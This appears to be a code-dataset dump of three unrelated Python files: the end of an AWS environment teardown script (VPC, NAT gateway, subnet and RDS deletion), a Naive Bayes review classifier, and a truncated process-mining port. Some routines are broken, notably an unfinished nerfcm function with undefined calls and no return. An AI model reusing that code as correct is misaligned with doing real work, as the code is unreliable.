RouteTableAssociationId=lst1[n]['RouteTableAssociationId']\n route_table_association = obj_client_ec2_resource.RouteTableAssociation(RouteTableAssociationId)\n response=route_table_association.get_available_subresources()\n response=route_table_association.delete()\n n+=1\n \n response = obj_client_ec2.delete_route_table(DryRun=False,RouteTableId=routetable)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DependencyViolation':\n print(e)\n elif e.response['Error']['Code'] == 'InvalidRouteTableID.NotFound':\n print('WARNING: Could not find the RouteTable ID: ', routetable)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_natgateway(self,natgateway):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_nat_gateway(NatGatewayId=natgateway)\n pprint(response)\n self.m_Waiter_NATGatewayToBeDeleted(natgateway)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'NatGatewayNotFound':\n print('WARNING: Could not find the NAT gateway: ', natgateway)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Waiter_NATGatewayToBeDeleted(self,natgateway):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n kwargs={'NatGatewayIds':\n [\n natgateway\n ],\n 'Filters':[\n {\n 'Name':'state',\n 'Values':[\n 'pending' , 'failed' , 'available' , 'deleting','deleted'\n ]\n }\n ],\n 'MaxResults':123\n }\n print('Waiting for the DELETED state of NAT Gateway: {0}'.format(natgateway))\n total_counter=150\n for counter in range(1,total_counter):\n response = obj_client_ec2.describe_nat_gateways(**kwargs)\n print('\\n', counter, \".\\t\", response['NatGateways'][0]['State'], \"-\\tNAT Gateway: \", natgateway, end='\\t')\n if response['NatGateways'][0]['State']=='deleted':\n print('\\n')\n break\n else:\n for i in range(1, 40):\n time.sleep(0.25)\n print('.', end='', flush=True)\n if counter >= 149:\n print('\\n','NAT Gateway {0} could not be deleted successfully: '.format(natgateway))\n def m_Delete_subnet(self,subnet):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_subnet(DryRun=False,SubnetId=subnet)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DependencyViolation':\n print(e)\n elif e.response['Error']['Code'] == 'InvalidSubnetID.NotFound':\n print('WARNING: Could not find the subnet ID: ', subnet)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_internetgateway(self,internetgateway):\n 
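# an internet gateway must be detached from its VPC before\n        # delete_internet_gateway can succeed, hence the detach call below\n        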
print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n obj_client_ec2.detach_internet_gateway(DryRun=False,InternetGatewayId=internetgateway,VpcId=self.vpc_id)\n response = obj_client_ec2.delete_internet_gateway(DryRun=False,InternetGatewayId=internetgateway)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidInternetGatewayID.NotFound':\n print('WARNING: Could not find the InternetGatewayID: ', internetgateway)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_RDS_DBSubnetGroup(self,rds_dbsubnetgroup):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n #NOTE:The specified database subnet group must not be associated with any DB instances\n obj_rds=boto3.client('rds',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_rds.delete_db_subnet_group(DBSubnetGroupName=rds_dbsubnetgroup)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DBSubnetGroupNotFoundFault':\n print('WARNING: Could not find the dbsubnetgroup: ', rds_dbsubnetgroup)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_RDS_DBInstance(self,rds_dbinstance):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_rds=boto3.client('rds',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n b_return=False\n kwargs={\n 'DBInstanceIdentifier':rds_dbinstance,\n 'SkipFinalSnapshot':True\n }\n response = obj_rds.delete_db_instance(**kwargs)\n pprint(response)\n status_DBInstanceStatus_delete=response['DBInstance']['DBInstanceStatus']\n self.m_Waiter_RDS_DBInstanceToBeDeleted(obj_rds,rds_dbinstance)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DBInstanceNotFound':\n print('WARNING: Could not find the DBInstance: ', rds_dbinstance)\n b_return=True\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Waiter_RDS_DBInstanceToBeDeleted(self,obj_rds,DBInstance):\n print('\\n{:-^80}'.format(inspect.stack()[0][3])) \n print('Waiting for the DBInstanceStatus {0} to be deleted'.format(DBInstance))\n kwargs={\n 'DBInstanceIdentifier':'string'\n }\n kwargs['DBInstanceIdentifier']=DBInstance\n total_counter=180\n for counter in range(1,total_counter):\n response=obj_rds.describe_db_instances(**kwargs)\n status_DBInstanceStatus=response['DBInstances'][0]['DBInstanceStatus']\n print('\\n', counter, \".\\t\", status_DBInstanceStatus,\"-\\tRDS DBInstance: \",DBInstance, end='\\t')\n if status_DBInstanceStatus == 'deleted':\n print('\\n')\n break\n elif status_DBInstanceStatus == 'deleting':\n for i in range(1, 40):\n time.sleep(0.25)\n print('.', end='', flush=True)\n if counter>=179:\n print('\\n','DBInstance {0} could not be deleted successfully '.format(DBInstance))\n def 
m_Delete_vpc(self,vpc):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n self.m_GetVPCDependencies(vpc)\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_vpc(DryRun=False,VpcId=vpc)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidVpcID.NotFound':\n print('WARNING: Could not find the VPC ID: ', vpc)\n #sys.exit(0)\n elif e.response['Error']['Code'] == 'DependencyViolation':\n #print('WARNING: VPC {0} has dependencies '.format(vpc))\n print(e)\n self.m_GetVPCDependencies(vpc)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_elasticip(self,elasticip):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.disassociate_address(DryRun=False,AssociationId=elasticip)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidAssociationID.NotFound':\n print('WARNING: Could not find the AssociationID for Elastic IP:', elasticip)\n elif e.response['Error']['Code'] == 'InvalidAllocationID.NotFound':\n print('WARNING: Could not find the AllocationID for Elastic IP:', elasticip)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n try:\n response = obj_client_ec2.release_address(DryRun=False,AllocationId=elasticip)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidAssociationID.NotFound':\n print('WARNING: Could not find the AssociationID for Elastic IP:', elasticip)\n elif e.response['Error']['Code'] == 'InvalidAllocationID.NotFound':\n print('WARNING: Could not find the AllocationID for Elastic IP:', elasticip)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_GetVPCDependencies(self,vpc):\n obj_client_ec2_resource = boto3.resource('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n vpc = obj_client_ec2_resource.Vpc(vpc)\n lst_dependencies=vpc.get_available_subresources()\n print(lst_dependencies)\nmyobj=cls_DeleteEnvironment()\nmyobj.m_Delete_Activities()","sub_path":"Camellia/Mod/Mod_DeleteEnvironment.py","file_name":"Mod_DeleteEnvironment.py","file_ext":"py","file_size_in_byte":29839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"619765035","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: tobiasbraun\n\"\"\"\n\nimport numpy as np\nimport scipy.sparse as spa\n\nclass NaiveBayesClassifier(): \n \n def __init__(self):\n self.is_trained = False\n \n def train(self, train_data: spa.csr_matrix, scores: np.ndarray, alpha = 0.001):\n \"\"\"trains the classifier.\"\"\"\n self.is_trained = True\n self.train_data = train_data\n self.scores = scores\n self.fractions = self.get_fractions()\n self.rev_to_rating_sum = self.convert_data()\n self.cond_prob = 
self.calculate_conditional_prob(alpha)\n \n \n def get_fractions(self):\n \"\"\"assigns the fraction of all reviews belonging to each rating value\"\"\"\n count = np.bincount(self.scores)[1:]\n fractions = count / np.sum(count)\n \n return fractions\n \n def convert_data(self):\n \"\"\"creates a list in which each entry represents a sparse matrices \n with the sum of all the words of all the reviews that have the same \n rating.\"\"\"\n rev_to_rating_list = [np.where(self.scores == i) for i in range (1,6)]\n rev_to_rating = [self.train_data.tocsr()[rev_to_rating_list[i]]\n for i in range(5)]\n rev_to_rating_sum = [rev_to_rating[i].sum(axis = 0) for i in range(5)]\n \n return rev_to_rating_sum\n \n def calculate_conditional_prob(self, a = 0.001):\n \"\"\"calculates the conditional probability of a word appearing in each \n rating category. Includes Laplace Smoothing with low ɑ.\"\"\"\n size = self.train_data.get_shape()[1]\n temp = self.rev_to_rating_sum\n self.cond_prob = [(temp[i]+a)/(temp[i].sum()+1+size) for i in range(5)]\n \n return self.cond_prob\n \n def fit(self, x: spa.csr_matrix):\n \"\"\"returns a numpy.array with the predicted ratings. Applies logs to \n avoid underflow and to take into account that the probability of \n appearance of a word increases if the same word has already appeared before.\"\"\"\n \n if self.is_trained == False:\n return (\"\"\"The Classifier has not been trained. Please use \n train(train_data: spa.csr_matrix, scores: np.ndarray, \n Laplace_alpha) to train the Classifier.\"\"\")\n else:\n final_predict = np.empty(0, dtype = int)\n for row in x:\n row_indices = spa.find(row)\n predictions = [0]*5\n for i in range(5):\n for j in range(0,len(row_indices[0])):\n predictions[i] += self.fractions[i] * (\n ((self.cond_prob[i][row_indices[0][j],\n row_indices[1][j]])) ** np.log(1 + row_indices[2][j]))\n smoothed_predictions = [np.log(predictions[i]) if (predictions[i] != 0) \n else float(\"-inf\") for i in range(5)]\n final_predict = np.append(final_predict, \n smoothed_predictions.index(max(smoothed_predictions)) + 1)\n \n return final_predict \n","sub_path":"CLASS_NaiveBayesClassifier.py","file_name":"CLASS_NaiveBayesClassifier.py","file_ext":"py","file_size_in_byte":3149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"92121161","text":"# python adaptation of http://is.ieis.tue.nl/research/summarization/\n# Neal Anwar, Kaiser Permanente intern\n\nimport csv\nimport numpy as np\nfrom datetime import datetime as dt\nfrom datetime import date\nimport math\nfrom scipy.spatial import distance\nfrom scipy.cluster import hierarchy\nfrom sklearn.cluster import KMeans\nimport scipy.stats\nimport warnings\n\n# this code imports some functions (mainly related to clustering)\n# directly from matlab so that when testing for accuracy outputs\n# exactly matched Matlab outputs (scikit and Matlab clustering are\n# different and produce different outputs)\nimport matlab.engine\neng = matlab.engine.start_matlab()\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# get bounds of the first section of array\n# a that contains exclusively the value k\n# (python adaptation of the Matlab (B == k) logical array function)\ndef bounds(a, k):\n # init bounds to -1\n bounds = []\n\n # logical array length\n lnth = 0\n\n # flag to detect sequence of k's\n seq = False\n\n # find range of times corresponding to this case\n for i in range(len(a)):\n # get lower bound of a sequence (count until case id appears)\n if 
a[i] == k:\n # increment logical array length count\n lnth += 1\n # if start of sequence\n if not seq:\n bounds.append(i)\n seq = True\n # if end of array and a sequence is in progress\n elif seq and i == len(a) - 1:\n bounds.append(i + 1)\n\n # get upper bound of a sequence (count until case id disappears)\n elif a[i] != k and seq:\n bounds.append(i)\n seq = False\n\n if len(bounds) == 1:\n bounds.append(bounds[0] + 1)\n # return bounds, len\n return bounds, lnth\n\n# constrains a to only include the ranges given in bnds\n# (python adaptation of the Matlab A(B == k) logical array index function)\ndef constrain(a, bnds):\n # constrained array\n new = list()\n\n # if bnds do not exist, return None\n if(len(bnds) == 0):\n return None\n\n # else, constrain a\n for i in range(0, len(bnds), 2):\n\n # get start bnd of current sequence\n start = bnds[i]\n\n # get end bnd of current sequence\n end = bnds[i + 1]\n\n # append current sequence to new\n new = a[start:end]\n\n # return constrained array\n return new\n\n# fuzzy set trapezoidal membership function\n# (python adaptation of the Matlab trapmf function)\ndef trapmf(v, abcd):\n x = np.zeros(shape=(len(v)), dtype=np.float_)\n y = np.zeros(shape=(len(v)), dtype=np.float_)\n\n # get a, b, c, d\n a = abcd[0]\n b = abcd[1]\n c = abcd[2]\n d = abcd[3]\n\n # print()\n # print('trapmf')\n # print(v, abcd)\n\n # set all elements of x such that v >= b to 1, < a to 0\n for i in range(len(v)):\n if v[i] >= b:\n x[i] = 1\n if v[i] < a:\n x[i] = 0\n\n # get all indices of v that are >= a and < b\n l = []\n for i in range(len(v)):\n if v[i] >= a and v[i] < b:\n l.append(i)\n\n # if l has elements and a != b\n # for all i in l, x[l[i]] = (v[l[i]] - a) * (1 / (b - a))\n for i in range(len(l)):\n # print(a, '!=', b)\n if a != b:\n # print(')', i, v[l[i]], a, b, (v[l[i]] - a) * float(1 / (b - a)))\n x[l[i]] = (v[l[i]] - a) * float(1 / (b - a))\n\n # set all elements of y such that v <= c to 1, > d to 0\n for i in range(len(v)):\n if v[i] <= c:\n y[i] = 1\n if v[i] > d:\n y[i] = 0\n\n # get all indices of v that are > c and <= d\n l = []\n for i in range(len(v)):\n if v[i] > c and v[i] <= d:\n l.append(i)\n\n # print(y, l)\n\n # if l has elements and c != d\n # for all i in l, y[l[i]] = (v[l[i]] - d) * (1 / (d - c))\n for i in range(len(l)):\n if c != d:\n # print(i, v[l[i]], c, d, (d - v[l[i]]), float(1 / (d - c)), (d - v[l[i]]) * float(1 / (d - c)))\n y[l[i]] = (d - v[l[i]]) * float(1 / (d - c))\n # print(y[l[i]])\n\n # set all elements of x to be the max of the original element\n # and the corresponding element in y\n for i in range(len(v)):\n # print(i, x[i], y[i])\n x[i] = min(x[i], y[i])\n\n # print('x', x)\n return x\n\n# non-Euclidean relational fuzzy c-means\n# (python adaptation of the Matlab nerfcm function)\ndef nerfcm(R, c, m, e):\n n = len(R)\n U0 = zeros(c, n)\n\n psize = math.ceil(n / c)\n temp = 1\n ind = [None] * n\n for i in range(n):\n ind[i] = temp\n if i % psize == 0:\n temp += 1\n\n U0 = np.zeros(shape=(c, n), dtype=np.float_)\n for i in range(n):\n U0[ind[i]][i] = 1\n\n d_adjustment = np.zeros(shape=(c, n), dtype=np.float_)\n num_it = 0\n max_it = 100\n U = U0\n beta = 0.0001\n min_d = 0.0000000001\n step_size = e\n\n while num_it < max_it and step_size >= e:\n num_it += 1\n U0 = U\n\n V = U0 * m\n V_t = list(map(list, zip(*V)))\n\n work = []\n for i in range(len(V)):\n work.append(sum(V[i]))\n\n for i in range(c):\n for j in range(V[i]):\n V[i][j] /= work[i]\n\n d = []\n for i in range(c):\n d[i] = list(map(list, zip(*(R * V[i])))) - 
V[i] * (list(map(list, zip(*(R * V[i])))) / 2)\n\n js = []\n for i in range(len(d)):\n elements = False\n for j in range(len(d[i])):\n if d[i][j] < 0:\n if not elements:\n elements = True\n js.append([])\n js[j].append(d[i][j])\n\n if len(js) > 0:\n for i in range(c):\n work = (V[i] * list(map(list, zip(*V[i]))) + 1) / 2\n d_adjustment[i] = work - V[i]\n\n work = (min_d - d[j]) / d_adjustment[j]\n beta_adjustment = max(work)\n beta += beta_adjustment\n\n# not mine; a python adaptation of Matlab's strdist\n# Levenshtein string distance function taken from https://en.wikibooks.org/wiki/Algorithm_Implementation/Strings/Levenshtein_distance\ndef levenshtein(s1, s2):\n if len(s1) < len(s2):\n return levenshtein(s2, s1)\n\n # len(s1) >= len(s2)\n if len(s2) == 0:\n return len(s1)\n\n previous_row = range(len(s2) + 1)\n for i, c1 in enumerate(s1):\n current_row = [i + 1]\n for j, c2 in enumerate(s2):\n insertions = previous_row[j + 1] + 1 # j+1 instead of j since previous_row and current_row are one character longer\n deletions = current_row[j] + 1 # than s2\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n######################################################\n# PART 0: Parse data log\n######################################################\n\n# business log file name\nfile_name = 'appeal.csv'\n\n# open file, convert contents to 2-D list, close file\nf = open(file_name, 'r')\ndata = list(csv.reader(f));\nf.close()\n\n# remove header row\ndata = data[1:]\n\n# transpose list so each category is stored in a sublist\ndata = [list(i) for i in zip(*data)]\n\n# create array of references to sublists\nids = [None] * len(data)\n\n# create array of references to unique indices in sublists\nidxs = [None] * len(data)\n\n# fill reference arrays\nfor i in range(len(data)):\n # if field is not a time field\n if i != 3 and i != 4:\n # fill \"ids\" with references to duplicates-removed, sorted sublists\n # fill \"idxs\" with indices of unique elements in sublist\n ids[i], idxs[i] = np.unique(data[i], return_inverse=True)\n else:\n # fill \"ids\" with references to raw time data\n ids[i] = data[i]\n\n# convert start/end times to ordinals\n# add 366 days to account for difference between python and Matlab ordinal system\nfor i in range(3, 5):\n for j in range(len(ids[i])):\n ids[i][j] = dt.strptime(ids[i][j], \"%Y/%m/%d %H:%M:%S.%f\").toordinal() + 366\n\n# get num cases\nn = len(ids[0])\n\n# create feature list\nlabels = ['caseID', 'throughput time', 'operating time', 'waiting time',\n 'reason', '# of activities', '# of resources']\n\n######################################################\n# PART 1: Create case info matrix\n# > Each of the n rows correspond to a case\n# > Column #1 is unique case ID\n# > Column #2 is total time duration of case (greatest end time - least begin time across all activities in case)\n# > Column #3 is total time elapsed during activities during case (sum of differences in end and begin times across all activities in case)\n# > Column #4 is duration - time elapsed\n# > Column #5 is minimum reason index used by case\n# > Column #6 is total number of activities in case\n# > Column #7 is total number of resources in case\n######################################################\n\n# create n x 7 matrix of zeros\nmat = np.zeros(shape=(n, 7), dtype=np.int)\n\n# replace first column of matrix with indices of case IDs\nmat[:,0] = np.unique(idxs[0])\n\nprint(idxs[5])\n\n# for 
each case\nfor i in range(n):\n times = [None] * 2\n\n # get bounds + logical array length for case i\n bnds, lnth = bounds(idxs[0], i)\n\n # get start and end times for case i\n for j in range(3, 5):\n\n # get and store range\n times[j - 3] = constrain(ids[j], bnds)\n\n # get max stop, get min start\n max_stop = np.max(times[1])\n min_start = np.min(times[0])\n\n # get difference in days, save to 2nd col\n diff = dt.fromordinal(max_stop) - dt.fromordinal(min_start)\n diff = diff.days\n mat[i][1] = diff\n\n # get sum of difference between end and start times, save to 3rd col\n sum = np.sum(np.subtract(times[1], times[0]))\n mat[i][2] = sum\n\n # get difference between mat[i][1] and mat[i][2], save to 4th col\n mat[i][3] = np.subtract(mat[i][1], mat[i][2])\n\n # get min unique reason index used by case i, save to 5th col\n reasons = np.min(constrain(idxs[5], bnds))\n mat[i][4] = reasons\n\n # get number of activities in case i, save to 6th col\n mat[i][5] = lnth\n\n # get number of unique resources in case i, save to 7th col\n mat[i][6] = len(np.unique(constrain(idxs[2], bnds)))\n\n######################################################\n# PART 2: Append activity and resource matrices to case info matrix\n# > Create two n x m matrices (n is total number of cases, m is number of unique activities/resources)\n# > Each row corresponds to a different case\n# > Each row counts the number of times each activity/resource was used in case n\n# > Names of activities/resources are saved in labels matrix\n# > Activity and resource matrices are appended to case info matrix\n######################################################\n\n# create and fill activity and resource matrices\nfor i in range(1, 3):\n # get number of activities/resources\n m = len(ids[i])\n\n # create new labels list\n new_labels = [None] * m\n\n # create n x m new matrix\n new_mat = np.zeros(shape=(n, m), dtype=np.int)\n\n # for each activity/resource\n for j in range(m):\n # save activity/resource name\n new_labels[j] = ids[i][j]\n\n # for each case, get number of occurrences for each activity/resource\n for k in range(n):\n # get bounds + logical array length for case k\n bnds, lnth = bounds(idxs[0], k)\n\n # get activities/resources corresponding to case k\n items = constrain(idxs[i], bnds)\n\n # get bounds + length for act/res j in the act/res corresponding to case k\n bnds, lnth = bounds(items, j)\n\n # get number of times act/res j was done in case k, save to new_mat[k][j]\n new_mat[k][j] = lnth\n\n # concatenate original labels list and new labels list\n labels = labels + new_labels\n\n # concatenate original matrix and new matrix\n concat_mat = np.zeros(shape=(n, mat.shape[1] + m), dtype=np.int)\n concat_mat[:, :mat.shape[1]] = mat\n concat_mat[:, mat.shape[1]:] = new_mat\n mat = concat_mat\n\n######################################################\n# PART 3: Create activity traces, traces_index, and count matrices\n# > Create n x k traces matrix (k is max number of possible activities in a case),\n# where each row j is a \"trace\" of the activities done in case j\n# in order converted to a string (i.e. if case 3 had activities\n# 1, 3, 3, 2, and 4, traces[3] would be 'a, b, b, c, d')\n#\n# > Create n x k traces index matrix where each row j is a trace of the\n# absolute indices of activities in case j across all cases (i.e. 
if all\n# cases had 5 activities traces_idx[2] would be '5, 6, 7, 8, 9')\n# because the activities within it are the 5th through 9th activities overall\n#\n# > Create n x 1 activity count matrix where each index is the number\n# of activities in case n (Keep in mind, this activity count vector\n# already exists as the 5th column of the case info matrix, but the\n# original Matlab code wanted it created anyway)\n######################################################\n\n# arrays to record incidence of activities in each case\n# traces and trace_idx have k cols where k is the number of activities\n# the case with the most activities has (to make room for this case)\nk = np.max(mat[:, 5])\n\ntraces = np.full(shape=(n, k), fill_value=-1, dtype=np.int)\ntrace_idx = np.full(shape=(n, k), fill_value=-1, dtype=np.int)\n# idx keeps track of how many activities a case has\nidx = [0] * n\n\n# get number of activities\nm = len(idxs[1])\n\n# for every (non-unique) activity i\nfor i in range(m):\n # get the unique index of the case j that invoked that activity\n j = idxs[0][i]\n\n # get the unique index of activity i, save to\n # next open index in row for case j\n traces[j][idx[j]] = idxs[1][i]\n\n # record index of activity in row for case j\n trace_idx[j][idx[j]] = i\n\n # increment activity count of case j\n idx[j] += 1\n\n# convert traces to a char array\ntraces_char = np.zeros(shape=(n, np.max(mat[:, 5])), dtype=np.unicode_)\nfor i in range(len(traces)):\n for j in range(len(traces[i])):\n traces_char[i][j] = chr(ord('a') + traces[i][j])\n\n######################################################\n# PART 4: Create unique sequence, sequence distance, and sequence index matrices\n# > Create matrix of all unique string sequences of ordered\n# activities (of all lengths from 2 to k) found across all cases (label_s)\n#\n# > Create sequence distances matrix where each row represents a\n# case j and there are k - 2 groups of columns where the xth column\n# group has s columns where s is the number of unique string activity\n# sequences of length x + 1 across all cases. For example, if there\n# 30 unique sequences of length 2 across all cases, the first column\n# group of the matrix will have 30 columns. Each column x contains the\n# least of the Levenshtein distances between the unique sequence x\n# and any sequence of the same length in the case (i.e. if row y, column x\n# is 1 (meaning zero distance), sequence x can be found in case y).\n# These least distance column groups for unique sequences occur in\n# increasing order of sequence length from left to right, from length 2 to k.\n#\n# > Create sequence index matrix where each row represents a\n# case j and there are k - 2 groups of columns where the xth column\n# group has s columns where s is the number of unique string activity\n# sequences of length x + 1 across all cases. This time, each column\n# m in column group x contains the indices of the earliest occurrence\n# of the unique sequence m of length x + 1 in case y. 
If this sequence\n# never occurs in case y, it contains the value -1.\n######################################################\n\n# create a matrix to store k label_seqs of different shapes\nlabel_s = [None] * (k - 1)\nmat_s = np.zeros(shape=(n, 1), dtype=np.float_)\nseq_ind = np.zeros(shape=(n, 1), dtype=np.int)\n\n# from 2 to max number of activities\nfor i in range(2, k + 1):\n # get number of possible activities left\n l = k - i + 1\n\n # create matrix of -1's with (remaining activity slots) * (number of cases) rows and i rows\n mat_pom = np.full(shape=(l * n, i), fill_value=-1, dtype=np.int)\n\n # partition traces into k / i equal columns of size i, and stack them\n # on top of one another in mat_pom, creating a matrix whose rows are\n # all the sequences of activities i long that exist in the log\n for j in range(l):\n mat_pom[(j * n):(j + 1) * n, :] = traces[:, j:j + i]\n\n # eliminating duplicate sequences of activities i long from mat_pom\n seq = np.unique(mat_pom, axis=0)\n\n # construct a logical array of the same size\n log = np.zeros(shape=(seq.shape[0], seq.shape[1]), dtype=np.int)\n\n # if (x, y) in seq is -1, set (x, y) in log to 1, marking all empty\n # activity spots in the set of unique sequences i long in log,\n # all other slots in the array being 0\n for x in range(len(log)):\n for y in range(len(log[x])):\n log[x][y] = seq[x][y] == -1\n\n # reduce log to a vector that contains only the max values of each row\n # of log, creating a vector where index j being 1 indicates that a unique\n # sequence of length i in the log had at least one empty activity slot\n log = np.amax(log, axis=1)\n\n # invert log, creating a vector where index j being 1 indicates that unique\n # a unique sequence of length i had no empty activity slots\n log = (log + 1) % 2\n\n # count number of activities in log with no empty activity slots\n cnt = 0\n for x in range(len(log)):\n cnt += log[x]\n\n # constrain seq to unique sequences that have no empty activity slots\n new_seq = np.zeros(shape=(cnt, seq.shape[1]), dtype=np.int)\n\n y = 0\n for x in range(len(log)):\n if log[x] == 1:\n new_seq[y,:] = seq[x,:]\n y += 1\n\n seq = new_seq\n\n # get number of unique sequences of length i\n s = len(seq)\n\n # create label seq matrix\n label_seq = np.zeros(shape=(s, seq.shape[1]), dtype=np.int)\n\n # create n x s seq matrix and matrix of zeros\n mat_seq = np.zeros(shape=(n, s), dtype=np.float_)\n sI = np.full(shape=(n, s), fill_value=-1, dtype=np.int)\n\n # for each unique sequence of length i\n for x in range(s):\n # copy xth unique sequence to label_seq\n label_seq[x,:] = seq[x,:]\n\n # convert unique sequence to string\n seq_char = np.zeros(shape=(seq.shape[1]), dtype=np.unicode_)\n for y in range(len(seq[x])):\n seq_char[y] = chr(ord('a') + seq[x][y])\n\n # for each case\n for y in range(n):\n # get the remaining number of activities in case y once\n # i activities have been removed\n # (i.e. 
calculate number of activities in case y - i + 1)\n l = mat[y][5] - i + 1\n\n # if no activities remain, set l to 1 (because we will still want\n # to look at one sequence of length k in the following loop)\n if l < 1:\n l = 1;\n\n # for each of the other string sequences of length i in case y\n for z in range(l):\n # calculate Levenshtein string distance between the current unique\n # string sequence of length i and the sequence of length i\n # from z:z + i in case y\n d = levenshtein(seq_char, traces_char[y, z:z + i])\n\n # subtract this distance from i, divide by the number of\n # characters in each string i\n d = 1 - d / float(i)\n\n # if distance is 1 (meaning two sequences are identical),\n # mark the slot in sI for this sequence (x) and this case (y)\n # with the number z (if this has not already been done),\n # afterwards the sI matrix will be filled with the starting\n # index of the earliest occurrence of the current unique\n # string sequence of length i in case y\n if d == 1 and sI[y][x] == -1:\n sI[y][x] = z;\n\n # record the least Levenshtein distance measured so far for\n # this sequence (row x) in case (y) in mat_seq\n # (i.e. record the least of all the distances between sequence\n # x and all other sequences of length i in case y)\n mat_seq[y][x] = max(mat_seq[y][x], d)\n\n # save label_seq to an index in label_s\n label_s[i - 2] = label_seq\n\n # concatenate mat_seq and mat_s\n new_mat_s = np.zeros(shape=(n, mat_s.shape[1] + mat_seq.shape[1]), dtype=np.float_)\n new_mat_s[:, :mat_s.shape[1]] = mat_s\n new_mat_s[:, mat_s.shape[1]:] = mat_seq\n mat_s = new_mat_s\n\n # concatenate seq_ind and sI\n new_seq_ind = np.zeros(shape=(n, seq_ind.shape[1] + sI.shape[1]), dtype=np.int)\n new_seq_ind[:, :seq_ind.shape[1]] = seq_ind\n new_seq_ind[:, seq_ind.shape[1]:] = sI\n seq_ind = new_seq_ind\n\n# crop out 1st columns of matrices\nmat_s = mat_s[:,1:]\nseq_ind = seq_ind[:,1:]\n\n# get number of matrices in label_s\ns = len(label_s)\n\n# create count of total rows in label_s\nrows_s = 0\n\n######################################################\n# PART 5: Create sequence info matrix, sequence label matrix\n# > Create matrix with s sets of m + 4 rows, where s is the number of unique\n# sequences of lengths 2 to k across all cases, and m is the number\n# of unique resources.\n# The xth set of rows contains various pieces of information about\n# sequence x:\n# Row 1) total duration of sequence in days\n# Row 2) total time elapsed during sequence in days\n# Row 3) difference between duration and time elapsed during sequence\n# Row 4) number of unique resources used by sequence\n# Row 5 to Row m) count of how many times resources 1 through m were used\n# by sequence\n#\n# > Create matrix with s sets of m + 4 rows, where s is the number of unique\n# sequences of lengths 2 to k across all cases, and m is the number\n# of unique resources. This matrix' rows store info about the meanings of\n# the rows in the sequence info matrix. 
